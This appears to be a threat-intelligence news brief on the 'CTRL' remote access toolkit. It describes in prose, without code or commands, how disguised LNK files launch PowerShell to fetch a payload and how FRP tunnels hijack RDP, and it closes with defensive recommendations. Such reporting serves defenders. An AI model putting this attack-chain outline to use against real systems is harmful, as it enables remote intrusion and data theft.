Russian CTRL Toolkit Hijacks RDP via Malicious LNK

What Happened

Cybersecurity researchers have identified an active campaign distributing a remote access toolkit of suspected Russian origin, dubbed “CTRL.” The malware is delivered via malicious Windows Shortcut (LNK) files, which are disguised as folders containing private keys. In a separate but notable development, Microsoft has pulled a non-security preview update for Windows 11 (KB5079391) due to installation errors. While the two events are not directly linked, the withdrawal of a legitimate update highlights the complex patch environment in which such threats operate, potentially creating windows of opportunity for attackers.

Why It Matters

This campaign matters because it employs a highly effective, low-tech initial vector-malicious LNK files-to deploy a sophisticated backdoor. The toolkit’s primary function is to hijack Remote Desktop Protocol (RDP) sessions, a critical administrative and remote work tool, and tunnel the traffic through FRP (Fast Reverse Proxy) to a command-and-control server. This allows attackers to maintain persistent, stealthy access to compromised systems, posing a significant data theft and network intrusion risk. The incident underscores that even without a new software vulnerability, social engineering and file-based attacks remain potent threats.

Technical Details

The attack chain begins with a spear-phishing email or other delivery method containing a ZIP archive. Inside, a malicious LNK file is disguised, often using a folder icon, to appear as a legitimate directory (e.g., “private_keys”). When executed, the LNK file runs a PowerShell script that downloads and executes the CTRL payload. Once installed, the toolkit establishes persistence and uses the open-source FRP tool to create a reverse tunnel. This tunnel redirects the compromised host’s RDP port (typically 3389) to an attacker-controlled server, effectively giving the threat actor remote control that bypasses many network-level defenses by blending with normal RDP traffic.

Immediate Risk

The immediate risk is MEDIUM. The attack does not exploit a zero-day or a specific CVE, relying instead on user interaction. However, its success rate can be high in environments with insufficient email filtering, disabled macro controls, or lack of user awareness training. Organizations with remote workers using RDP are particularly at risk of credential theft and lateral movement. The threat is active and in the wild, requiring proactive defensive measures rather than emergency patching, as seen with critical updates like CVE-2026-32194.

Security Insight

Security teams should prioritize defense-in-depth strategies. Technical controls should include blocking LNK files from email attachments where possible, enforcing strict application allow-listing to prevent unauthorized PowerShell execution, and monitoring outbound connections for unknown FRP client traffic. User training is critical to recognize suspicious file attachments. Furthermore, restrict RDP access through VPNs or bastion hosts and implement robust logging and alerting for RDP connection attempts, especially those originating from unexpected external IPs. Regularly review and test patch management processes to avoid delays that could be exploited, keeping in mind that other critical vulnerabilities, such as CVE-2026-31957, also demand timely attention.